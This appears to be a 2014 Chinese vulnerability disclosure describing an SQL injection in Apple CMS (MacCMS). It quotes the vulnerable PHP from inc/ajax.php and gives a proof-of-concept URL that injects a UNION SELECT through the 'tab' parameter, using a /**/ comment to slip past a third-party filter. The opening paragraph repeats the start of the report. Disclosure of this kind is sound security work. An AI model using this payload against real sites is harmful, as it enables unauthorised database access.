### 简要描述: 看到之前一发路人甲的漏洞,厂商说未测试成功,我也换个地方试试 ### 详细说明: [WooYun: 苹果CMS系统sql注入一枚](http://www.wooyun.org/bugs/wooyun-2014-063677) 这个漏洞,厂商说未测试成功,然后继续换个地方看看。 inc/ajax.php:123行 ``` elseif($ac=='score') { if($id<1){ echo "err"; return;} $score = intval(be("get", "score")); $res = '{"scoreall":0,"scorenum":0,"score":0.0}'; if($score<0) { $score = 0;} elseif( $score > 10) { $score = 10; } if($tab=='art') { $col='a'; } else { $col='d'; } $sql="SELECT ".$col."_score,".$col."_scoreall,".$col."_scorenum FROM {pre}".$tab." WHERE ".$col."_id=" .$id; $row=$db->getRow($sql); if($row){ $d_score = $row["d_score"]; $d_scoreall = $row["d_scoreall"]; $d_scorenum = $row["d_scorenum"]; if($score>0){ if(getCookie($tab."score".$id)=="ok"){ echo "haved"; return;} $d_scoreall += $score; $d_scorenum++; $d_score = round( $d_scoreall / $d_scorenum ,1); $db->Update ("{pre}vod",array($col."_score",$col."_scoreall",$col."_scorenum"),array($d_score,$d_scoreall,$d_scorenum),$col."_id=".$id); sCookie...
### 简要描述: 看到之前一发路人甲的漏洞,厂商说未测试成功,我也换个地方试试 ### 详细说明: [WooYun: 苹果CMS系统sql注入一枚](http://www.wooyun.org/bugs/wooyun-2014-063677) 这个漏洞,厂商说未测试成功,然后继续换个地方看看。 inc/ajax.php:123行 ``` elseif($ac=='score') { if($id<1){ echo "err"; return;} $score = intval(be("get", "score")); $res = '{"scoreall":0,"scorenum":0,"score":0.0}'; if($score<0) { $score = 0;} elseif( $score > 10) { $score = 10; } if($tab=='art') { $col='a'; } else { $col='d'; } $sql="SELECT ".$col."_score,".$col."_scoreall,".$col."_scorenum FROM {pre}".$tab." WHERE ".$col."_id=" .$id; $row=$db->getRow($sql); if($row){ $d_score = $row["d_score"]; $d_scoreall = $row["d_scoreall"]; $d_scorenum = $row["d_scorenum"]; if($score>0){ if(getCookie($tab."score".$id)=="ok"){ echo "haved"; return;} $d_scoreall += $score; $d_scorenum++; $d_score = round( $d_scoreall / $d_scorenum ,1); $db->Update ("{pre}vod",array($col."_score",$col."_scoreall",$col."_scorenum"),array($d_score,$d_scoreall,$d_scorenum),$col."_id=".$id); sCookie ($tab."score".$id,"ok"); } if($d_score>10) { $d_score=10; } $res = '{"scoreall":'.$d_scoreall.',"scorenum":'.$d_scorenum.',"score":'.$d_score.'}'; } unset ($row); echo $res; } ``` 上面可以看到$id>=1,$tab可控,$score我们不用管,这时候我们让$col='d';table就必须是mac_vod了,所以这里只需要让360_safe3.php不拦截我们就可以注入了。 因此这种注入应该还是需要从自身代码层杜绝,而不该依赖第三方防护脚本。 直接注入肯定被拦截: [<img src="https://images.seebug.org/upload/201406/261322574658a26db496f2eb98b482fb4769353a.png" alt="maccms2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/261322574658a26db496f2eb98b482fb4769353a.png) poc: ``` http://localhost/maccms/inc/ajax.php?ac=score&id=1&tab=vod union select/**/1,user(),3 from dual%23 ``` [<img src="https://images.seebug.org/upload/201406/2613231642b519dfa4236e08f927fd4275ba134d.png" alt="maccms.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/2613231642b519dfa4236e08f927fd4275ba134d.png) ### 漏洞证明: 看到厂商说没时间改代码了,看来还是不要继续看了~~ [<img src="https://images.seebug.org/upload/201406/2613231642b519dfa4236e08f927fd4275ba134d.png" alt="maccms.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/2613231642b519dfa4236e08f927fd4275ba134d.png)
